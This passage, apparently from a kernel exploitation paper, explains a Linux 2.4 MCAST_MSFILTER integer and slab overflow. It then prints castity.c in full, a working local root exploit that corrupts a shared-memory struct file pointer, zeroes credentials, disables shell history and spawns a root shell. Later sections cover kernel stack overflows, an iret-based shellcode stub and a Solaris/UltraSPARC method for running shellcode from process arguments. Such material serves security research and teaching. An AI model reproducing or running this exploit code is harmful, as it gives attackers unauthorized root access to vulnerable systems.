[...]

static int newseg (key_t key, int shmflg, size_t size)
{
[...]
        shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), GFP_USER);
[...]
}

As you see, struct shmid_kernel is 64 bytes long and gets allocated using
the kmalloc (size-64) generic cache [ we can alloc as many as we want (up
to filling the slab) using subsequent 'shmget' calls ].
Inside it there is a struct file pointer, that we can make point, thanks
to the overflow, to userland, where we will emulate all the necessary
structs to reach a function pointer dereference (that's exactly what the
exploit does).

Now it is time to force the msize value into being > 32 and <= 64, to make
it get alloc'ed inside the same (size-64) generic cache.
'Good' values for gsf->gf_numsrc range from 0x40000005 to 0x4000000c.
That raises another problem : since we're able to write 4 bytes for
every __kernel_sockaddr_storage present in the gsf struct we need a pretty
large one to reach the 'shm_file' pointer, and so we need to pass a large
'optlen' value.
The 0x40000005 - 0x4000000c range, though, makes the GROUP_FILTER_SIZE()
macro used at [4] evaluate to a positive and small value, which isn't
large enough to reach the 'shm_file' pointer.
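
The wrap-around can be checked with plain 32-bit arithmetic. The sketch
below re-evaluates both macros in userland, assuming the i386 sizes of
the structures involved (20 bytes for struct ip_msfilter, 268 for struct
group_filter, 128 for struct __kernel_sockaddr_storage); those sizes and
the helper names are assumptions, not taken from the text.

```c
#include <stdint.h>

/*
 * Assumed i386 sizes (not stated in the text):
 *   sizeof(struct ip_msfilter)  == 20, sizeof(__u32) == 4
 *   sizeof(struct group_filter) == 268
 *   sizeof(struct __kernel_sockaddr_storage) == 128
 */
#define MSFILTER_HDR   (20u - 4u)
#define GFILTER_HDR    (268u - 128u)

/* IP_MSFILTER_SIZE() evaluated in 32-bit arithmetic, wrap included. */
uint32_t msfilter_size(uint32_t numsrc)
{
        return MSFILTER_HDR + numsrc * 4u;
}

/* GROUP_FILTER_SIZE() evaluated the same way. */
uint32_t group_filter_size(uint32_t numsrc)
{
        return GFILTER_HDR + numsrc * 128u;
}

/* 1 if msize lands in the size-64 generic cache (32 < msize <= 64). */
int lands_in_size64(uint32_t numsrc)
{
        uint32_t msize = msfilter_size(numsrc);

        return msize > 32u && msize <= 64u;
}
```

Under those assumptions gf_numsrc = 0x40000005 gives msize = 36 and
GROUP_FILTER_SIZE = 780, while 0x4000000c gives 64 and 1676 : msize stays
inside the size-64 cache for the whole range, and the values just outside
it (0x40000004 and 0x4000000d) do not.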

We solved that problem thanks to the fact that, once an object is free'd,
its 'memory contents' are not zero'ed (or cleaned in any way).
Since the copy_from_user at [3] happens _before_ the check at [4], we were
able to create a sequence of 1024-sized objects by repeatedly issuing a
failing (at [4]) 'setsockopt', thus obtaining a large-enough one.

Hoping to make it clearer, let's sum up the steps :

  - fill the 1024 slabs so that at the next allocation a fresh one is
    returned
  - alloc the first object of the new 1024-slab
  - use as many 'failing' setsockopt as needed to copy values inside
    objects 2 and 3 [and 4, if needed, not the usual case though]
  - free the first object
  - use a smaller (but still 1024-slab allocation driving) value for
    optlen that would pass the check at [4]

At that point the gsf pointer points to the first object inside our
freshly created slab. Objects 2 and 3 haven't been re-used yet, so they
still contain our data. Since the objects inside the slab are adjacent we
have a de-facto larger (and large enough) gsf struct to reach the
'shm_file' pointer.
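
A quick back-of-the-envelope count shows why three adjacent size-1024
objects are enough. This is a sketch under assumed i386 layout values
(imsf_slist[] at offset 16 inside struct ip_msfilter, 'shm_file' at
offset 28 inside struct shmid_kernel, GROUP_FILTER_SIZE(0) == 140); none
of them is stated in the text and the helper names are hypothetical.

```c
#include <stddef.h>

/* Assumed i386 layout values; none of them is stated in the text. */
#define SLIST_OFF     16u   /* offset of imsf_slist[] in struct ip_msfilter */
#define GF_HDR        140u  /* GROUP_FILTER_SIZE(0) */
#define GF_SRC_SIZE   128u  /* sizeof(struct __kernel_sockaddr_storage) */

/*
 * Number of gf_slist[] entries needed to write up to and including the
 * 4-byte field at 'target_off' inside the object that follows an msf
 * object of 'obj_size' bytes, plus one non-AF_INET entry to stop the
 * copy loop.
 */
size_t sources_needed(size_t obj_size, size_t target_off)
{
        size_t words = (obj_size - SLIST_OFF) / 4 + target_off / 4 + 1;

        return words + 1;
}

/* Bytes of user-supplied gsf data required for 'nsrc' entries. */
size_t gsf_bytes(size_t nsrc)
{
        return GF_HDR + nsrc * GF_SRC_SIZE;
}

/* How many adjacent objects of 'chunk' bytes that data spans. */
size_t chunks_spanned(size_t bytes, size_t chunk)
{
        return (bytes + chunk - 1) / chunk;
}
```

With a 64 byte msf object and shm_file assumed at offset 28, this gives
21 entries (the value of OVF in castity.c), 2828 bytes of gsf data and
thus 3 objects of 1024 bytes.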

Last note, to reliably fill the slabs we check /proc/slabinfo.
The exploit, called castity.c, was written when the advisory went out, and
is only for 2.4.* kernels (the sys_epoll vulnerability [12] was more than
enough for 2.6.* ones ;) )

The exploit follows, just without the initial header, since the approach
has already been extensively explained above.
    
< stuff/expl/linux/castity.c >

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>

#define __u32           unsigned int
#define MCAST_MSFILTER  48
#define SOL_IP          0
#define SIZE            4096
/* Set it to whatever file you can read. It's just for 1024 filling. */
#define R_FILE          "/etc/passwd"

struct in_addr {
   unsigned int   s_addr;
};

#define __SOCK_SIZE__   16

struct sockaddr_in {
  unsigned short        sin_family;     /* Address family   */
  unsigned short int    sin_port;       /* Port number      */
  struct in_addr        sin_addr;       /* Internet address */

  /* Pad to size of `struct sockaddr'. */
  unsigned char         __pad[__SOCK_SIZE__ - sizeof(short int) -
                        sizeof(unsigned short int) -
                        sizeof(struct in_addr)];
};

struct group_filter
{
        __u32                   gf_interface;   /* interface index */
        struct sockaddr_storage gf_group;       /* multicast address */
        __u32                   gf_fmode;       /* filter mode */
        __u32                   gf_numsrc;      /* number of sources */
        struct sockaddr_storage gf_slist[1];    /* source addresses */
};

struct  damn_inode      {
        void            *a, *b;
        void            *c, *d;
        void            *e, *f;
        void            *i, *l;
        unsigned long   size[40];  // Yes, somewhere here :-)
} le;


struct  dentry_suck     {
        unsigned int    count, flags;
        void            *inode;
        void            *dd;
} fucking = { 0xbad, 0xbad, &le, NULL };

struct  fops_rox        {
        void            *a, *b, *c, *d, *e, *f, *g;
        void            *mmap;
        void            *h, *i, *l, *m, *n, *o, *p, *q, *r;
        void            *get_unmapped_area;
} chien;



struct  file_fuck       {
        void            *prev, *next;
        void            *dentry;
        void            *mnt;
        void            *fop;
} gagne = { NULL, NULL, &fucking, NULL, &chien };



static char     stack[16384];

int             gotsig = 0,
                fillup_1024 = 0,
                fillup_64 = 0,
                uid, gid;

int             *pid, *shmid;



static void sigusr(int b)
{
        gotsig = 1;
}

void fatal (char *str)
{
        fprintf(stderr, "[-] %s\n", str);
        exit(EXIT_FAILURE);
}

#define BUFSIZE 256

int calculate_slaboff(char *name)
{
        FILE *fp;
        char slab[BUFSIZE], line[BUFSIZE];
        int ret;
        /* UP case */
        int active_obj, total;

        bzero(slab, BUFSIZE);
        bzero(line, BUFSIZE);

        fp = fopen("/proc/slabinfo", "r");
        if ( fp == NULL )
                fatal("error opening /proc for slabinfo");

        fgets(slab, sizeof(slab) - 1, fp);
        do {
                ret = 0;
                if (!fgets(line, sizeof(line) - 1, fp))
                        break;
                ret = sscanf(line, "%s %u %u", slab, &active_obj,
                             &total);
        } while (strcmp(slab, name));

        close(fileno(fp));
        fclose(fp);

        return ret == 3 ? total - active_obj : -1;

}

int populate_1024_slab()
{
        int fd[252];
        int i;

        signal(SIGUSR1, sigusr);

        for ( i = 0; i < 252 ; i++)
                fd[i] = open(R_FILE, O_RDONLY);

        while (!gotsig)
                pause();
        gotsig = 0;

        for ( i = 0; i < 252; i++)
                close(fd[i]);

}


int kernel_code()
{
        int i, c;
        int *v;

        __asm__("movl   %%esp, %0" : : "m" (c));

        c &= 0xffffe000;
         v = (void *) c;


        for (i = 0; i < 4096 / sizeof(*v) - 1; i++) {
                if (v[i] == uid && v[i+1] == uid) {
                        i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                }
                if (v[i] == gid) {
                        v[i++] = 0; v[i++] = 0;
                        v[i++] = 0; v[i++] = 0;
                        return -1;
                }
        }

        return -1;
}




void    prepare_evil_file ()
{
        int i = 0;

        chien.mmap = &kernel_code ;   // just to pass do_mmap_pgoff check
        chien.get_unmapped_area = &kernel_code;

        /*
         * First time i run the exploit i was using a precise offset for
         * size, and i calculated it _wrong_. Since then my laziness took
         * over and i use that ""very clean"" *g* approach.
         * Why i'm telling you ? It's 3 a.m., i don't find any better than
         * writing blubbish comments
         */

        for ( i = 0; i < 40; i++)
                le.size[i] = SIZE;

}

#define SEQ_MULTIPLIER  32768

void    prepare_evil_gf ( struct group_filter *gf, int id )
{
        int                     filling_space = 64 - 4 * sizeof(int);
        int                     i = 0;
        struct sockaddr_in      *sin;

        filling_space /= 4;

        for ( i = 0; i < filling_space; i++ )
        {
              sin = (struct sockaddr_in *)&gf->gf_slist[i];
              sin->sin_family = AF_INET;
              sin->sin_addr.s_addr = 0x41414141;
        }

        /* Emulation of struct kern_ipc_perm */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = IPC_PRIVATE;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = -1;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = id/SEQ_MULTIPLIER;

        /* evil struct file address */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = (unsigned long)&gagne;

        /* that will stop mcast loop */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = 0xbad;
        sin->sin_addr.s_addr = 0xdeadbeef;

        return;

}

void    cleanup ()
{
        int                     i = 0;
        struct shmid_ds         s;

        for ( i = 0; i < fillup_1024; i++ )
        {
                kill(pid[i], SIGUSR1);
                waitpid(pid[i], NULL, __WCLONE);
        }

        for ( i = 0; i < fillup_64 - 2; i++ )
                shmctl(shmid[i], IPC_RMID, &s);

}


#define EVIL_GAP        4
#define SLAB_1024       "size-1024"
#define SLAB_64         "size-64"
#define OVF             21
#define CHUNKS          1024
#define LOOP_VAL        0x4000000f
#define CHIEN_VAL       0x4000000b

main()
{
        int                     sockfd, ret, i;
        unsigned int            true_alloc_size, last_alloc_chunk;
        unsigned int            loops;
        char                    *buffer;
        struct group_filter     *gf;
        struct shmid_ds         s;

        char    *argv[] = { "le-chien", NULL };
        char    *envp[] = { "TERM=linux", "PS1=le-chien\\$",
"BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null",
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
"HISTFILE=/dev/null", NULL };


        true_alloc_size = sizeof(struct group_filter) -
                          sizeof(struct sockaddr_storage) +
                          sizeof(struct sockaddr_storage) * OVF;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        uid = getuid();
        gid = getgid();

        gf = malloc (true_alloc_size);
        if ( gf == NULL )
                fatal("Malloc failure\n");

        gf->gf_interface = 0;
        gf->gf_group.ss_family = AF_INET;

        fillup_64 = calculate_slaboff(SLAB_64);

        if ( fillup_64 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_64, fillup_64);

        /* Yes, two would be enough, but we have that "sexy" #define, why
         * don't use it ? :-) */

        fillup_64 += EVIL_GAP;

        shmid = malloc(fillup_64 * sizeof(int));
        if ( shmid == NULL )
                fatal("Malloc failure\n");

        /* Filling up the size-64 and obtaining a new page with EVIL_GAP
         * entries */

        for ( i = 0; i < fillup_64; i++ )
                shmid[i] = shmget(IPC_PRIVATE, 4096, IPC_CREAT|SHM_R);

        prepare_evil_file();
        prepare_evil_gf(gf, shmid[fillup_64 - 1]);

        buffer = (char *)gf;

        fillup_1024 = calculate_slaboff(SLAB_1024);
        if ( fillup_1024 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_1024, fillup_1024);

        fillup_1024 += EVIL_GAP;


        pid = malloc(fillup_1024 * sizeof(int));
        if (pid  == NULL )
                fatal("Malloc failure\n");

        for ( i = 0; i < fillup_1024; i++)
                pid[i] = clone(populate_1024_slab,
                               stack + sizeof(stack) - 4, 0, NULL);

        printf("[+] Attempting to trash size-1024 slab\n");

        /* Here starts the loop trashing size-1024 slab */

        last_alloc_chunk = true_alloc_size % CHUNKS;
        loops = true_alloc_size / CHUNKS;

        gf->gf_numsrc = LOOP_VAL;

        printf("[+] Last size-1024 chunk is of size %d\n",
               last_alloc_chunk);
        printf("[+] Looping for %d chunks\n", loops);

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        if ( last_alloc_chunk > 512  )
                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER,
                                 buffer + loops * CHUNKS, last_alloc_chunk);
        else

        /*
         * Should never happen. If it happens it probably means that we've
         * bigger datatypes (or slab-size), so probably
         * there's something more to "fix me". The while loop below is
         * already okay for the eventual fixing ;)
         */

              fatal("Last alloc chunk fix me\n");

        while ( loops > 1 )
        {
                kill(pid[--fillup_1024], SIGUSR1);
                waitpid(pid[fillup_1024], NULL, __WCLONE);

                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER,
                                 buffer + --loops * CHUNKS, CHUNKS);
        }

        /* Let's the real fun begin */

        gf->gf_numsrc = CHIEN_VAL;

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        shmctl(shmid[fillup_64 - 2], IPC_RMID, &s);
        setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS);

        cleanup();

        ret = (unsigned long)shmat(shmid[fillup_64 - 1], NULL,
                                   SHM_RDONLY);


        if ( ret == -1)
        {
                printf("Le Fucking Chien GAGNE!!!!!!!\n");
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                execve("/bin/sh", argv, envp);
                exit(0);
        }

        printf("Here we are, something sucked :/ (if not L1_cache too big, "
               "probably slab align, retry)\n" );

}
   
< / > 


------[ 2.3 - Stack overflow vulnerabilities


When a process is in 'kernel mode' it has a stack which is different from
the stack it uses in userland. We'll call it the 'kernel stack'.
That kernel stack is usually limited in size to a couple of pages (on
Linux, for example, it is 2 pages, 8 KB, but a compile time option
exists to limit it to one page), so it is no surprise that a common
design practice in kernel development is to use as little stack space as
possible inside a function.

At first glance, we can imagine two different scenarios that could go
under the name of 'stack overflow vulnerabilities' :

 - 'standard' stack overflow vulnerability : a write past a buffer on the
   stack overwrites the saved instruction pointer or the frame pointer
   (Solaris only, Linux is compiled with -fomit-frame-pointer) or some
   variable (usually a pointer) also located on the stack.

 - 'stack size overflow' : a deeply nested callgraph goes beyond the
   alloc'ed stack space.

Stack based exploitation is more architecture and o.s. specific than the
already presented slab based one.
That is due to the fact that once the stack is trashed we achieve
execution flow hijack, but then we must find a way to somehow return to
userland. We won't cover here the details of the x86 architecture, since
those have already been very well explained by noir in his phrack60 paper
[13].

We will instead focus on the UltraSPARC architecture and on its most
common operating system, Solaris. The next subsection will describe its
relevant details and will present a technique which is suitable as well
for exploiting slab based overflows (or, more generally, whatever
'controlled flow redirection' vulnerability).

The AMD64 architecture won't be covered yet, since it will be our 'example
architecture' for the next kind of vulnerabilities (race conditions). The
sendmsg [5] exploit proposed later on is, in the end, a stack based one.

Just before going on with the UltraSPARC section we'll spend a couple of
words describing the return-to-ring3 needs on an x86 architecture and the
Linux use of the kernel stack (since it differs quite a bit from the
Solaris one).

Linux packs together the stack and the struct associated to every process
in the system (on Linux 2.4 it was directly the task_struct, on Linux 2.6
it is the thread_info one, which is way smaller and keeps inside a pointer
to the task_struct). This memory area is, by default, 8 KB (a kernel
option exists to have it limited to 4 KB), that is the size of two pages,
which are allocated consecutively and with the first one aligned to a 2^13
multiple. The address of the thread_info (or of the task_struct) is thus
calculable at runtime by masking out the 13 least significant bits of the
kernel stack pointer (%esp).
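
In C the masking is a one-liner. The sketch below assumes the default
8 KB stack on a 32-bit x86 kernel; kstack_base is a hypothetical name.
The same mask (0xffffe000) is what kernel_code() in castity.c applies to
%esp to locate the task_struct on 2.4.

```c
#include <stdint.h>

#define KSTACK_SIZE 8192u   /* two 4 KB pages, the default layout */

/*
 * Base of the stack area, where thread_info (2.6) or task_struct (2.4)
 * sits: clear the 13 least significant bits of the stack pointer.
 */
uint32_t kstack_base(uint32_t esp)
{
        return esp & ~(KSTACK_SIZE - 1u);
}
```

Any stack pointer value inside the same 8 KB area maps to the same base
address.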

The stack starts at the bottom of this area (its highest address) and
'grows' towards the top (its lowest address), where the thread_info (or
the task_struct) is located. To prevent the 'second' type of overflow when
the 4 KB kernel stack is selected at compile time, the kernel uses two
additional per-CPU stacks, one for interrupt handling and one for softirq
and tasklet functions, both one page in size.

It is obviously on the stack that Linux stores all the information needed
to return from exceptions, interrupts or function calls and, logically, to
get back to ring3, for example by means of the iret instruction.
If we want to use the 'iret' instruction inside our shellcodes to get out
cleanly from kernel land we have to prepare a fake stack frame laid out
the way it expects to find it.

We have to supply:
  - a valid user space stack pointer
  - a valid user space instruction pointer
  - a valid saved EFLAGS register
  - a valid User Code Segment
  - a valid User Stack Segment

 HIGHER ADDRESS
 +-----------------+
 |                 |
 |   User SS       | -+
 |   User ESP      |  |
 |   EFLAGS        |  |  Fake Iret Frame
 |   User CS       |  |
 |   User EIP      | -+  <----- current kernel stack pointer (ESP)
 |                 |
 +-----------------+
 
We've added a demonstrative stack based exploit (for the Linux dummy
driver) which implements a shellcode doing that recovery-approach :

  movl   $0x7b,0x10(%esp)       // user stack segment (SS)
  movl   $stack_chunk,0xc(%esp) // user stack pointer (ESP)
  movl   $0x246,0x8(%esp)       // valid EFLAGS saved register
  movl   $0x73,0x4(%esp)        // user code segment (CS)
  movl   $code_chunk,0x0(%esp)  // user code pointer  (EIP)
  iret

You can find it in < expl/linux/stack_based.c > 
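
The frame built by that shellcode can also be written down as a C
struct, which makes the offsets used by the movl instructions easy to
check. This is just an illustrative sketch for 32-bit x86 : the struct
and function names are made up here, and the selector values (0x73,
0x7b) and the EFLAGS value (0x246) are simply the ones used in the
shellcode.

```c
#include <stddef.h>
#include <stdint.h>

/* Frame popped by 'iret' when returning to ring3 (x86, 32 bit). */
struct iret_frame {
        uint32_t eip;     /* 0x00: user instruction pointer */
        uint32_t cs;      /* 0x04: user code segment */
        uint32_t eflags;  /* 0x08: saved EFLAGS */
        uint32_t esp;     /* 0x0c: user stack pointer */
        uint32_t ss;      /* 0x10: user stack segment */
};

/* Fill a frame with the selector and EFLAGS values of the shellcode. */
void fill_iret_frame(struct iret_frame *f, uint32_t user_eip,
                     uint32_t user_esp)
{
        f->eip = user_eip;
        f->cs = 0x73;
        f->eflags = 0x246;
        f->esp = user_esp;
        f->ss = 0x7b;
}
```

The member offsets match the displacements from %esp in the shellcode,
with the user EIP at the lowest address of the frame.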


---[ 2.3.1 - UltraSPARC exploiting


The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit [2]
architecture. The most 'interesting' part of it from an exploiting
perspective is the support it gives to the operating system for a fully
separated address space between userspace and kernelspace.

This is achieved through the use of context registers and address space
identifiers ('ASI'). The UltraSPARC MMU provides two settable context
registers, the primary (PContext) and the secondary (SContext) one. One
more context register, hardwired to zero, is provided, which is the
nucleus context ('context' 0 is where the kernel lives).
Every process address space has an associated 'context value', which is
set inside the PContext register during process execution. This value is
used to perform memory address translation.

Every time a process issues a trap instruction to access kernel land (for
example ta 0x8 or ta 0x40, which is how system calls are implemented on
Solaris 10), the nucleus context is set as default. The process context
value (as recorded inside PContext) is then moved to SContext, while the
nucleus context becomes the 'primary context'.

At that point the kernel code can access userland directly by specifying
the correct ASI to a load or store alternate instruction (instructions
that accept an ASI given as an immediate - lda/sta).
Address Space Identifiers (ASIs) basically specify how those instructions
have to behave :

< usr/src/uts/sparc/v9/sys/asi.h >

#define ASI_N                   0x04    /* nucleus */
#define ASI_NL                  0x0C    /* nucleus little */
#define ASI_AIUP                0x10    /* as if user primary */
#define ASI_AIUS                0x11    /* as if user secondary */
#define ASI_AIUPL               0x18    /* as if user primary little */
#define ASI_AIUSL               0x19    /* as if user secondary little */

[...]

#define ASI_USER        ASI_AIUS

< / > 

These are the ASIs specified by the SPARC v9 reference (more ASIs are
machine dependent and let you modify, for example, MMU or other hardware
registers, check usr/src/uts/sun4u/sys/machasi.h). The 'little' version is
just used to specify a byte ordering different from the 'standard' big
endian one (SPARC v9 can access data in both formats).

ASI_USER is the one used to access, from kernel land, the user space.
An instruction like :

       ldxa [addr]ASI_USER, %l1

would just load the double word stored at 'addr', relative to the address
space context stored in the SContext register, 'as if' it was accessed by
userland code (so with all protection checks).

It is thus possible, if we are able to start executing a minimal stub of
code, to copy bytes from userland to wherever we want in kernel land.

But how do we execute code in the first place ? Or, to make it even
clearer, where do we return once we have performed our (slab/stack)
overflow and hijacked the instruction pointer ?

To complicate things a little more, the UltraSPARC architecture implements
an execute permission bit on TTEs (Translation Table Entries, which are
the TLB entries used to perform virtual/physical translations).

It is time to take a look at the Solaris kernel implementation to find a
solution. The technique we're going to present now (as you'll quickly
figure out) is not limited to stack based exploiting, but can be used
every time you're able to redirect the instruction flow in kernel land to
an arbitrary address.


---[ 2.3.2 - A reliable Solaris/UltraSPARC exploit


The Solaris process model is slightly different from the Linux one. The
fundamental unit of scheduling is the 'kernel thread' (described by the
kthread_t structure), so one has to be associated to every existing LWP
(light-weight process) in a process.
LWPs are just kernel objects which represent the 'kernel state' of every
'user thread' inside a process and thus let each one enter the kernel
independently (without LWPs, user threads would contend at system call).

The information relative to a 'running process' is thus scattered among
different structures. Let's see what we can make out of them.
Every Operating System (and Solaris doesn't differ) has a way to quickly
get the 'current running process'. On Solaris it is the 'current kernel
thread' and it's obtained, on UltraSPARC, by :

#define curthread       (threadp())  

< usr/src/uts/sparc/ml/sparc.il >

! return current thread pointer

        .inline threadp,0
        .register %g7, #scratch
        mov     %g7, %o0
        .end

< / > 

It is thus stored inside the %g7 global register.
From the kthread_t struct we can access all the other 'process related'
structs. Since our main purpose is to raise privileges we're interested in
where the Solaris kernel stores process credentials.

Those are saved inside the cred_t structure pointed to by the proc_t one :

# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
0000030000e67488::print proc_t
{
    p_exec = 0x30000e5b5a8
    p_as = 0x300008bae48
    p_lockp = 0x300006167c0
    p_crlock = {
        _opaque = [ 0 ]
    }
    p_cred = 0x3000026df28
[...]
0x3000026df28::print cred_t
{
    cr_ref = 0x67b
    cr_uid = 0
    cr_gid = 0
    cr_ruid = 0
    cr_rgid = 0
    cr_suid = 0
    cr_sgid = 0
    cr_ngroups = 0
    cr_groups = [ 0 ]
}
::offsetof proc_t p_cred
offsetof (proc_t, p_cred) = 0x20
::quit

#

The '::ps' dcmd output introduces a very interesting feature of the
Solaris Operating System, which is a godsend for exploiting.
The address of the proc_t structure in kernel land is exported to
userland :

bash-2.05$ ps -aef -o addr,comm | grep snmpdx
     30000e67488 /usr/lib/snmp/snmpdx
bash-2.05$

At first glance that may not seem of great help, since, as we said, the
kthread_t struct keeps a pointer to the related proc_t one :

::offsetof kthread_t t_procp
offsetof (kthread_t, t_procp) = 0x118
::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
0000030000e67488::print proc_t p_tlist
p_tlist = 0x30000e52800
0x30000e52800::print kthread_t t_procp
t_procp = 0x30000e67488


To understand more precisely why the exported address is so important we
have to take a deeper look at the proc_t structure.
This structure contains the user_t struct, which keeps information like
the program name, its argc/argv value, etc :

> 0000030000e67488::print proc_t p_user
[...]
    p_user.u_ticks = 0x95c
    p_user.u_comm = [ "snmpdx" ]
    p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" ]
    p_user.u_argc = 0x4
    p_user.u_argv = 0xffbffcfc
    p_user.u_envp = 0xffbffd10
    p_user.u_cdir = 0x3000063fd40
[...]

We can control many of those.
Even more important, the pages that contain the process_cache (and thus
the user_t struct) are not marked no-exec, so we can execute from there
(unlike, for example, the kernel stack, which is allocated from the seg_kp
[kernel pageable memory] segment and is not executable).

Let's see how 'u_psargs' is declared :

< usr/src/common/sys/user.h >
#define PSARGSZ         80      /* Space for exec arguments (used by ps(1)) */
#define MAXCOMLEN       16      /* <= MAXNAMLEN, >= sizeof (ac_comm) */

[...]

typedef struct  user {
        /*
         * These fields are initialized at process creation time and never
         * modified.  They can be accessed without acquiring locks.
         */
        struct execsw *u_execsw;        /* pointer to exec switch entry */
        auxv_t  u_auxv[__KERN_NAUXV_IMPL]; /* aux vector from exec */
        timestruc_t u_start;            /* hrestime at process start */
        clock_t u_ticks;                /* lbolt at process start */
        char    u_comm[MAXCOMLEN + 1];  /* executable file name from exec */
        char    u_psargs[PSARGSZ];      /* arguments from exec */
        int     u_argc;                 /* value of argc passed to main() */
        uintptr_t u_argv;               /* value of argv passed to main() */
        uintptr_t u_envp;               /* value of envp passed to main() */
  
[...]

< / >

The idea is simple : we put our shellcode on the command line of our
exploit (without 'zeros') and we calculate from the exported proc_t
address the exact return address.
This is enough to exploit all those situations where we have control of
the execution flow _without_ trashing the stack (function pointer
overwriting, slab overflow, etc).

We have to remember to take care of the alignment, though, since the
UltraSPARC fetch unit raises an exception if the address it reads the
instruction from is not aligned on a 4-byte boundary (which is the size
of every sparc instruction) :

> ::offsetof proc_t p_user
offsetof (proc_t, p_user) = 0x330
> ::offsetof user_t u_psargs
offsetof (user_t, u_psargs) = 0x161


Since the proc_t taken from the 'process cache' is always aligned to an 8
byte boundary, and 0x330 + 0x161 = 0x491, we have to jump 3 bytes past the
start of the u_psargs char array (which is where we'll put our shellcode)
to land on a 4-byte boundary.
That leaves us space for 76 / 4 = 19 instructions, which is usually enough
for an average shellcode.. but space is not really a limit, since we can
'chain' the psargs of several processes, simply jumping from one to the
next. Moreover we could write a two stage shellcode that would just copy
over a larger one from userland using the load from alternate space
instructions presented before.
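
The alignment arithmetic above can be sketched in a few lines of C. This
is only an illustration : the helper names are hypothetical, the offsets
are the ones mdb printed on the test box (they have to be re-checked on
any other kernel build) and we assume the last byte of u_psargs is kept
for the terminating NUL.

```c
#include <assert.h>
#include <stdint.h>

#define P_USER_OFF    0x330u  /* offsetof(proc_t, p_user), from mdb above   */
#define U_PSARGS_OFF  0x161u  /* offsetof(user_t, u_psargs), from mdb above */
#define PSARGSZ       80u     /* size of u_psargs, from sys/user.h          */
#define SPARC_INSN_SZ 4u      /* every SPARC instruction is 4 bytes long    */

/* Bytes to skip from 'addr' to reach the next 4-byte boundary (0..3). */
static unsigned align_pad(uint64_t addr)
{
        return (unsigned)((SPARC_INSN_SZ - (addr % SPARC_INSN_SZ)) %
                          SPARC_INSN_SZ);
}

/* Address of the first aligned instruction slot inside u_psargs. */
static uint64_t psargs_code_addr(uint64_t proc_addr)
{
        uint64_t psargs;

        assert(proc_addr % 8 == 0);     /* proc_t is 8-byte aligned */
        psargs = proc_addr + P_USER_OFF + U_PSARGS_OFF;
        return psargs + align_pad(psargs);
}

/* Whole instructions that fit after the pad, keeping one byte for NUL. */
static unsigned psargs_insn_slots(uint64_t proc_addr)
{
        uint64_t psargs = proc_addr + P_USER_OFF + U_PSARGS_OFF;

        return (PSARGSZ - align_pad(psargs) - 1u) / SPARC_INSN_SZ;
}
```

With the proc_t address shown by ps (0x30000e67488) the pad comes out as
3 bytes and the number of usable slots as 19, matching the figures in the
text.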

We're now facing a slightly more complex scenario, though, which is the
'kernel stack overflow'. We assume here that you're somewhat familiar with
userland stack based exploiting (if you're not you can check [15] and
[16]).
The main problem here is that we have to find a way to safely return to
userland once we have trashed the stack (to reach the saved instruction
pointer we also overwrite the saved frame pointer). A good way to
understand how the 'kernel stack' is used to return to userland is to
follow the path of a system call.
You can get a quite good primer here [17], but we think that a read
through the opensolaris sources is way better (following the sys_trap
entry in uts/sun4u/ml/mach_locore.s you'll also see the code setting the
nucleus context as the PContext register).

Let's focus on the 'kernel stack' usage : 

< usr/src/uts/sun4u/ml/mach_locore.s >

        ALTENTRY(user_trap)
        !
        ! user trap
        !
        ! make all windows clean for kernel
        ! buy a window using the current thread's stack
        !
        sethi   %hi(nwin_minus_one), %g5
        ld      [%g5 + %lo(nwin_minus_one)], %g5
        wrpr    %g0, %g5, %cleanwin
        CPU_ADDR(%g5, %g6)
        ldn     [%g5 + CPU_THREAD], %g5
        ldn     [%g5 + T_STACK], %g6
        sub     %g6, STACK_BIAS, %g6
        save    %g6, 0, %sp
  
< / > 

%g5 holds the number of windows 'implemented' by the architecture minus
one, which is, in this case, 8 - 1 = 7.
CLEANWIN is set to that value since no window other than the current one
is in use, and so the kernel has 7 free windows to use.

The cpu_t struct addr is then saved in %g5 (by CPU_ADDR) and, from there,
the thread pointer [ cpu_t->cpu_thread ] is obtained.
